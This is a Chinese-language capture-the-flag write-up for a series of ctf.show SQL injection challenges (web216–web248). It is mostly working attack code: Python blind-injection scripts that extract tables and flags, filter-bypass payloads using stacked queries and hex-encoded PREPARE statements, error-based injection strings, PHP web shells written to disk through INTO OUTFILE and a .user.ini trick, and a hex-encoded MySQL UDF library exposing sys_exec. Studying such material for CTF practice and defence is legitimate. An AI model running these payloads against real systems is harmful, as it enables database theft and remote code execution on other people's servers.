
题解

import requests

url = "http://7c369116-52db-4f1e-83e6-1588d920cabe.challenge.ctf.show/api/"

#查table_name
#payload = "1) or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(2),0)#"
#if()如果比较为真执行sleep(2)让查询等待两秒，如果为假则返回0
#ascii()比较提取的ASCII值与动态生成的值{}是否大于的比较操作，实现二分法搜索
#substr()提取特定{}位置字符
#select group_concat(table_name) from information_schema.tables where table_schema=database(): 这是一个 SQL 查询，用于从 information_schema.tables 表中选择当前数据库中所有表的表名，并使用 group_concat 将它们拼接成一个字符串。

#得到ctfshow_flagxc

#查column_name
#payload = "1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))>{},sleep(2),0)#"
#相较于上一个payload，sql查询语句有了变化，group_concat()的值为column_name,后面information_schema.columns，也变成从table_name里面查询
#id,flagaa,info
payload = "1) or if(ascii(substr((select group_concat(flagaac) from ctfshow_flagxcc),{},1))>{},sleep(2),0)#"
#查flaga的值

i = 0
result = ""

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        data = {
            "debug" : 1,
            "ip" : payload.format(i,mid)
        }
        try:
            #如果这个请求成功，没有引发异常，那么 response 将保存响应对象，而 tail 将被设置为当前二分搜索的中间值 mid
            response = requests.post(url=url,data=data,timeout=2)
            tail=mid
        except Exception as e:
            #这是一个捕获异常的块，它捕获所有类型的异常并将异常对象保存在 e 变量中
            head = mid+1
            #如果请求过程中发生了异常，通常说明当前的 mid 值太大，导致请求失败。为了继续二分搜索，将 head 更新为 mid + 1。
    if head == 0:
        break
    result += chr(head)
    #chr(head): 这是一个内置函数，它将一个 ASCII 数值转换为相应的字符
    print(result.lower())
    #result.lower(): 这是一个字符串方法，用于将字符串中的所有字符转换为小写形式。

web217

题目

1
2
3

function waf($str){
      return preg_match('/sleep/i',$str);
  }

过滤了sleep()函数，尝试其他方法绕过

题解

#非二分法将需要修改的paylaod与无需修改的进行拼接，从给定的字符中匹配
import requests
url = "http://6ebacf65-2af6-42e6-bd95-ff4801db4efa.challenge.ctf.show/api/"

strr = "ctfshow{}1234567890-qeryuipadgjklzxvbnm"
#payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
#LIMIT 0, 1 表示从查询结果中选择行的范围。具体而言，它表示从结果集中的第0行开始，选择1行。在这个特定的查询中，它的作用是限制结果集只返回第一行。
payload = "select flagaabc from ctfshow_flagxccb"
j = 1
res = ""
while 1:
    for i in strr:
        data = {
            'ip': f"1) or if(substr(({payload}),{j},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        try:
            r = requests.post(url,data=data,timeout=3)
        except Exception as e:
            res +=i
            print(res)
            j+=1

web218

题目

题解

#非二分法将需要修改的paylaod与无需修改的进行拼接，从给定的字符中匹配
import requests
url = "http://6ebacf65-2af6-42e6-bd95-ff4801db4efa.challenge.ctf.show/api/"

strr = "ctfshow{}1234567890-qeryuipadgjklzxvbnm"
#payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
#LIMIT 0, 1 表示从查询结果中选择行的范围。具体而言，它表示从结果集中的第0行开始，选择1行。在这个特定的查询中，它的作用是限制结果集只返回第一行。
payload = "select flagaabc from ctfshow_flagxccb"
j = 1
res = ""
while 1:
    for i in strr:
        data = {
            'ip': f"1) or if(substr(({payload}),{j},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        try:
            r = requests.post(url,data=data,timeout=3)
        except Exception as e:
            res +=i
            print(res)
            j+=1

web219

题目

//屏蔽危险分子
   function waf($str){
       return preg_match('/sleep|benchmark|rlike/i',$str);
   }

还可以使用笛卡尔积

题解

import requests
url = "http://dbdee4c3-4fe3-46e9-98fc-cb990b62784f.challenge.ctf.show/api/"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxca' limit 1,1"
payload = "select flagaabc from ctfshow_flagxca"
j = 1
res = ""
while 1:
    for i in strr:
        data = {
            'ip': f"1) or if(substr(({payload}),{j},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        # print(i)
        try:
            r = requests.post(url, data=data, timeout=3)
        except Exception as e:
            res += i
            print(res)
            j+=1

# data = {
#             'ip': f"1) or if(1=1,(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
#             'debug': '1'
# }
# r = requests.post(url, data=data, timeout=3)

可能会跑出错误的flag，多跑几次试试就行

web220

题目

使用 ord 代替 ascii

使用 locate 代替 substr

使用笛卡尔积

1
2
3

function waf($str){
        return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
    }

题解

web221

题目

开始其他注入

说我们只要拿到数据库名字就行

题解

payload

1	http://77f44211-91d3-49d7-8fa4-edeb58af4117.challenge.ctf.show/api/?page=2&limit=1%20procedure%20%20analyse(extractvalue(rand(),concat(0x3a,database())),1)

web222

题目

查询语句

1 2	//分页查询 $sql = select * from ctfshow_user group by $username;

题解

import requests

url = "http://3544e733-8273-45fa-aa1f-1d1d2c6dd5ad.challenge.ctf.show/api/"

# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},username,0)"
# 得到 ctfshow_flaga,ctfshow_user
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'),{},1))>{},username,0)"
# 得到 id,flagaabc,info
payload = "if(ascii(substr((select group_concat(flagaabc) from ctfshow_flaga),{},1))>{},username,0)"
# 得到flag
result = ""
i = 0

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        param = {
            "u" : payload.format(i,mid),
        }
        response = requests.get(url=url,params=param)
        if "passwordAUTO" in response.text:
            head = mid+1
        else:
            tail = mid
    if head==0:
        break;
    result += chr(head)
    print(result)

web223

题目

与上题差不多，这是过滤了数字

用Ture代替1

题解

# Author: yanmie

import requests

url = "http://d327989c-3ab5-429d-93ad-4cddaded94ba.challenge.ctf.show/api/"
# payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},{}))>{},username,'a')"
# 得到 ctfshow_flagas,ctfshow_user
# payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'),{},{}))>{},username,'a')"
# 得到 id,flagasabc,info
payload = "if(ascii(substr((select group_concat(flagasabc) from ctfshow_flagas),{},{}))>{},username,'a')"
# 得到 flag
result = ""
i = 0

def createNum(num):
    if num==1:
        return True
    else:
        res = "True"
        for i in range(num-1):
            res += "+True"
        return res

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        params = {
            "u" : payload.format(createNum(i),createNum(1),createNum(mid)),
        }
        response = requests.get(url=url,params=params)
        if "passwordAUTO" in response.text:
            head = mid+1
        else:
            tail = mid
    if head == 0 :
        print("[+]the result is : ",result)
        break
    result += chr(head)
    print(result)

web224

题目

不会

题解

web225

题目

堆叠注入提升基础难度

//师傅说过滤的越多越好
 if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
   die(json_encode($ret));
 }

题解

解法一

但没过滤 show ,可以配合 hander 读数据

1	/api/?username=1';show tables;

1	/api/?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

解法二

预处理

1	/api/?username=1';show tables;PREPARE atlant1c from concat('sel','ect ' database()');EXECUTE atlant1c;

1	/api/?username=1';show tables;PREPARE atlant1c from concat('sel','ect * from ctfshow_flagasa');EXECUTE atlant1c;

web226

题目

堆叠注入提升中级难度

//师傅说过滤的越多越好
 if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
   die(json_encode($ret));
 }

show和(也被ban了

题解

使用十六进制编码

1	/api/?username=1';PREPARE atlant1c from 0x73686F77207461626C6573;EXECUTE atlant1c;

1	/api/?username=1';PREPARE atlant1c from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;EXECUTE atlant1c;

web227

题目

堆叠注入提升高级难度

//师傅说过滤的越多越好
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){
    die(json_encode($ret));
  }

题解

查一下information_schema.Routines，这个表是MySQL数据库中的一个系统表，它包含了所有存储过程和函数的详细信息，例如它们的名称、参数、返回值、创建时间、修改时间、字符集等。通过查询这个表，可以方便地了解数据库中所有存储过程和函数的信息，从而更好地管理和维护数据库。值得注意的是，该表不包含触发器的信息。

1	/api/?username=1';PREPARE atlant1c from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE atlant1c;

然后直接就能查到getflag()这个函数有他的返回值。

web228-web230

都可以用16进制编码绕过

都是先查字段

web231-web232

题目

1 2	//分页查询 $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

题解

查表名

1	password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

查列名

1	password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1

得到flag

1 2	password=1',username=(select flagas from flaga) where 1=1#&username=1

web233

题目

利用时间盲注

题解

# @Author: yanmie

import requests

url = "http://97240940-d8ac-45e4-92f4-4d4baeb81d18.chall.ctf.show/api/"
# paylaod = "ctfshow' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(0.5),1) and '1'='1"
# 得到 banlist,ctfshow_user,flag233333
# paylaod = "ctfshow' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))>{},sleep(0.5),1) and '1'='1"
# 得到  id,flagass233,info
paylaod = "ctfshow' and if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))>{},sleep(0.5),1) and '1'='1"

result = ""
i = 0

while True:
    i += 1
    head = 0
    tail = 127
    while head<tail:
        mid = (head+tail)//2
        data = {
            "password" : 1,
            "username" : paylaod.format(i,mid),
        }
        try:
            response = requests.post(url=url,data=data,timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid+1
    if head == 0:
        print("[+]the result is : ",result)
        break
    result += chr(head)
    print(result)

web234

题目

1	$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

单引号不能用了，但是password传\就可控了

题解

1	password=\&username=,username=(select flagass23s3 from flag23a)#

web235-web236

题目

1	$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

过滤了 or ‘

题解

据说是无列名注入

我没做出来

1	# username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- - &password=\

web237

题目

insert注入

1 2	//插入数据 $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

题解

先查表名

1	username=3',(select group_concat(table_name) from information_schema.tables where table_schema=database()));-- A&password=1

查到 banlist,ctfshow_user,flag

然后查字段名

1	username=3',(select group_concat(column_name) from information_schema.columns where table_name='flag'));-- A&password=1

查字段

1	username=3',(select flagass23s3 from flag));-- A&password=1

web238

题目

还是insert注入，这次过滤了空格

1 2	//插入数据 $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

题解

1	username=3',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#

1 2	username=3',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1 username=3',(select(flag)from(flagb)));#&password=1

用括号包裹代替空格，#闭合

web239

题目

1 2	//插入数据 $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

这次过滤了空格和or

题解

查表

1	1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#

1	1',(select(group_concat(column_name))from(mysql.innodb_table_stats)where(table_name=flagbb)))#

web240

题目

Hint: 表名共9位，flag开头，后五位由a/b组成，如flagabaab，全小写

1	//过滤空格 or sys mysql

题解

脚本

import requests

kk = "ab"
url1 = "http://bccdb51c-955b-410c-9213-7558f1e6d85a.challenge.ctf.show/api/insert.php"
url2 = "http://bccdb51c-955b-410c-9213-7558f1e6d85a.challenge.ctf.show/api/?page=1&limit=100"
for i in kk:
    for j in kk:
        for m in kk:
            for n in kk:
                for c in kk:
                    flag = "flag" + i + j + m + n + c
                    print(flag)
                    data = {
                        'username': "yn8rt',(select(group_concat(flag))from({})));#".format(flag),
                        'password': 1
                    }
                    res = requests.post(url=url1, data=data).text

                    r = requests.get(url=url2).text
                    print(r)
                    if "ctfshow{" in r:
                        print(res)
                        exit()

web241

delete注入，看别人的博客是时间盲注，但是我跑脚本没跑出来，应该是非预期解被ban了

web242

题目

flie文件读写

1 2	//备份表 $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

题解

利用info outfile的扩展参数来做题

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]

“OPTION”参数为可选参数选项，其可能的取值有：

FIELDS TERMINATED BY '字符串'：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是“\t”。

FIELDS ENCLOSED BY '字符'：设置字符来括住字段的值，只能为单个字符。默认情况下不使用任何符号。

FIELDS OPTIONALLY ENCLOSED BY '字符'：设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

FIELDS ESCAPED BY '字符'：设置转义字符，只能为单个字符。默认值为“\”。

LINES STARTING BY '字符串'：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

LINES TERMINATED BY '字符串'：设置每行数据结尾的字符，可以为单个或多个字符。默认值是“\n”。
可以写马的参数有：

FIELDS TERMINATED BY、 LINES STARTING BY、 LINES TERMINATED BY

在url/api/dump.php下写马

马在url/dump/1.php

1	filename=1.php' LINES STARTING BY "<?php eval($_POST[1]);?>";#

web243

题目

返回逻辑

//过滤了php

题解

在上一题目的payload中是需要php字段的，这里给取消掉了，也不知道phtml好不好用，但是本地重要考点在于.user.ini:auto_append_file=1.png或者auto_prepend_file=1.png

再熟悉一遍上一题的参数：

FIELDS TERMINATED BY：设置字符串为字段之间的分隔符，可以为单个或多个字符。默认值是“\t”。

LINES STARTING BY ‘字符串’：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使用任何字符。

LINES TERMINATED BY ‘字符串’：设置每行数据结尾的字符，可以为单个或多个字符。默认值是“\n”。

payload：

先上ini：

1	filename=.user.ini' lines starting by 'auto_append_file="a.png";'%23

注意16进制是为了0a(换行)发挥作用，而starting by “;”，是想让每行数据的开头字符都是分号，是为了让前面的那个select * from ctfshow_user查出来的东西与后面的做个了断

再上png🐴：

filename=1.png’ LINES TERMINATED BY

1	filename=a.png' lines starting by '<?=eval($_POST[1]);?>'%23

连接时候注意是/dump/index.php

web244-web245

题目

报错注入

题解

报错注入的两种形式：

extractvalue(目标xml文档，xml路径):对XML文档进行查询的函数


updatexml(目标xml文档，xml路径，更新的内容):更新xml文档的函数

其都是针对xml路径进行的注入

payload：

updatexml:
?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,32),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select left(flag,32) from ctfshow_flag),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select right(flag,32) from ctfshow_flag),0x7e),1)+--+

extractvalue:
?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))+--+

?id=1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),1,30),0x7e))+--+

ctfshow{60c51f5b-9f2e-43bb-8781-225b09375b46}

web246

题目

1	过滤updatexml extractvalue

题解

#获取表名
1' union select 1,count(*),concat(0x3a,0x3a,(select (table_name) from information_schema.tables where table_schema=database()  limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

#获取列名
1' union select 1,count(*),concat(0x3a,0x3a,(select (column_name) from information_schema.columns where table_name='ctfshow_flags'  limit 1,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

#获取数据
1' union select 1,count(*),concat(0x3a,0x3a,(select (flag2) from ctfshow_flags  limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a%23

web247

Mysql取整函数
1.round
四舍五入取整
round(s,n)：对s四舍五入保留n位小数,n取值可为正、负、零.
如四舍五入到整数位，则n取零.

2.ceil
向上取整
ceil(s)：返回比s大的最小整数

3.floor
向下取整
floor(s)：返回比s小的最大整数

直接把上一步的floor替换成ceil或者round即可。
有一点需要注意下，列名查出来是flag?，所以我们在查数据的时候要包个反引号

1	1' union select 1,count(),concat(0x3a,0x3a,(select (`flag?`) from ctfshow_flagsa limit 0,1),0x3a,0x3a, round(rand(0)2))a from information_schema.columns group by a%23

web248

题目

题解

import requests

base_url="http://1ef2b753-fc26-4b9a-b5e7-9e06f9841c14.challenge.ctf.show/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F00